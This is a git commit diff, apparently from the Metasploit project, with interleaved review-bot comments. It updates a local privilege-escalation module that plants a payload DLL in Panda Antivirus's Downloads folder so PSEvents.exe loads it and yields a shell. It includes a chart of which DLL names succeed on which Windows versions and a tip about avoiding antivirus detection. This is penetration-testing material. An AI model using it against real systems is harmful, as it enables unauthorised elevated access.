updated dlls and docs

bug/bundler_fix
h00die 2016-10-20 20:45:50 -04:00
parent 3b548dc3cd
commit 12e4fe1c5c
2 changed files with 24 additions and 11 deletions

@ -2,9 +2,12 @@
Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/) or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).
The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour. I put in an exclusion for the AV for the folder to ensure it didn't catch meterpreter in action.
The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour. I 32bit meterpreter seems to get caught, so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.
The downloads folder can take a few minutes to appear after install, you may want to wait an hour or so, but it will eventually appear.
The downloads folder can take a 10-15 minutes to appear after install, and its downloaded by Panda AV from the company.
1. Theres an HTTP GET request to 23.215.132.154 for /retail/psprofiler/40032/psprofiler_suite.exe
2. Then right after HTTP GET request to 23.215.132.154 for /retail/psevents_suite.exe.
## Verification Steps
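Review bot: the rewritten sentence about the AV exclusion has a stray "I" ("I 32bit meterpreter seems to get caught") and mixes tenses ("didn't catch"); suggest "32-bit meterpreter seems to get caught, so you may need an AV exclusion for the folder to ensure it doesn't catch meterpreter in action." The next line has the same kind of slips: "can take a 10-15 minutes" should drop the "a", and "its downloaded by Panda AV" should read "it's downloaded". Since the two numbered items document outbound GET requests to a hard-coded IP, it would also help to say these are the requests that populate the Downloads folder, so a reader knows why they matter to the wait time.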
@ -24,7 +27,17 @@
**DLL**
Which DLL to name our payload. The original vulnerability writeup utilized bcryptPrimitives.dll, however I found which dll to be VERY picky. CRYPTBASE.dll seemed to work the best and is the default.
Which DLL to name our payload. The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used. However the dll seems to be VERY picky. Default is cryptnet.dll. See the chart for more details.
| | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll |
|---------------------------------------------------------------|-------------|-------------|----------------------|---------------|--------------|-------------|
| 64bit target (1), win10 x64 | CRASH | CRASH | NO | NO | valid | no |
| 64bit target (1), win8.1 x86 | CRASH | CRASH | NO | valid | valid | no |
| 32bit target (0), win10 x64 | CRASH | CRASH | NO | NO | valid | no |
| 32bit target (0), win8.1 x86 | CRASH | CRASH | NO | valid | valid (caught by av) | no |
| 32bit target (0), win7sp1 x86 | | | valid | | valid (caught by av) | |
In this chart, `CRASH` means PSEvents.exe crashed on the system. `NO` means PSEvents didn't crash, but no session was obtained. `valid` means we got a shell.
**ListenerTimeout**
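Review bot: the chart contradicts the new default. The prose says "Default is cryptnet.dll", but the cryptnet.dll column is marked "valid (caught by av)" for both 32-bit x86 rows, and the legend only defines `CRASH`, `NO` and `valid`; state whether "caught by av" still yielded a session, or give it its own legend entry. The blank cells in the win7sp1 row are also ambiguous (untested vs. not applicable); an explicit "untested" would avoid readers assuming those DLLs are safe to try. Finally, the chart keeps WINHTTP.dll, VERSION.dll and WININET.dll columns even though this commit removes them from the option list, so a sentence noting they were dropped because they crash PSEvents.exe (or never produce a session) would tie the table to the change.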
@ -73,7 +86,7 @@
Name Current Setting Required Description
---- --------------- -------- -----------
DLL CRYPTBASE.dll yes dll to create (Accepted: WINHTTP.dll, VERSION.dll, bcryptPrimitives.dll, CRYPTBASE.dll, cryptnet.dll, WININET.dll)
DLL CRYPTBASE.dll yes dll to create (Accepted: cryptnet.dll, bcryptPrimitives.dll, CRYPTBASE.dll)
ListenerTimeout 3610 yes Number of seconds to wait for the exploit
SESSION 1 yes The session to run this module on.
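Review bot: the updated `show options` line still shows `DLL CRYPTBASE.dll` as the current setting, while the module change in this same commit sets the default to `cryptnet.dll`; the documented output should be regenerated so the "Current Setting" column matches the new default.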

@ -53,8 +53,8 @@ class MetasploitModule < Msf::Exploit::Local
))
register_options(
[
OptEnum.new('DLL', [ true, 'dll to create', 'CRYPTBASE.dll',
['WINHTTP.dll', 'VERSION.dll', 'bcryptPrimitives.dll', 'CRYPTBASE.dll', 'cryptnet.dll', 'WININET.dll']]),
OptEnum.new('DLL', [ true, 'dll to create', 'cryptnet.dll',
['cryptnet.dll', 'bcryptPrimitives.dll', 'CRYPTBASE.dll']]),
OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 3610]),
], self.class)
end
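Review bot: the narrowed `OptEnum` list is consistent with the chart in the docs (WINHTTP.dll, VERSION.dll and WININET.dll either crashed PSEvents.exe or produced no session), but nothing in the module records why those names were removed; a one-line comment above the option, or a note in the module description, would stop a future contributor from re-adding a DLL name that crashes the target process.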
@ -62,18 +62,18 @@ class MetasploitModule < Msf::Exploit::Local
def get_path()
case sysinfo['OS']
when /Windows (7|8|10|2012|2008)/
return '%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
return '%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171'
when /Windows (NT|XP)/
return '%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
return '%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171'
end
end
def check
directory
if directory(get_path())
if directory?(get_path())
print_good('Vuln path exists')
CheckCode::Appears
else
vprint_error("#{get_path()} doesn't exist on target")
CheckCode::Safe
end
end
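Review bot: `check` still contains a bare `directory` statement on the line before `if directory?(get_path())`; it takes no argument and is not used, so it looks like a leftover from the rename and should be deleted. Separately, `get_path` only returns a value for the two `when` branches, so on any other `sysinfo['OS']` string `directory?(nil)` is called; returning `CheckCode::Unknown` (or `Safe`) when `get_path` is `nil` would make the check robust. Dropping the trailing backslash from both returned paths is fine given the join change in the exploit hunk below, but `get_path` should document that callers must now add the separator.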
@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Local
vprint_status("OS Detected as: #{sysinfo['OS']}")
payload_filepath = get_path()
payload_filepath = "#{payload_filepath}#{datastore['DLL']}"
payload_filepath = "#{payload_filepath}\\#{datastore['DLL']}"
upload_payload_dll(payload_filepath)
# start the hour wait
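Review bot: `"#{payload_filepath}\\#{datastore['DLL']}"` builds a path from the result of `get_path` without checking for `nil`; if the OS regex does not match, string interpolation turns `nil` into an empty string and the payload would be uploaded to `\cryptnet.dll` at the drive root rather than into the Panda Downloads folder. Suggest a `fail_with(Failure::NoTarget, ...)` (or at least an early return) when `payload_filepath` is `nil` before calling `upload_payload_dll`.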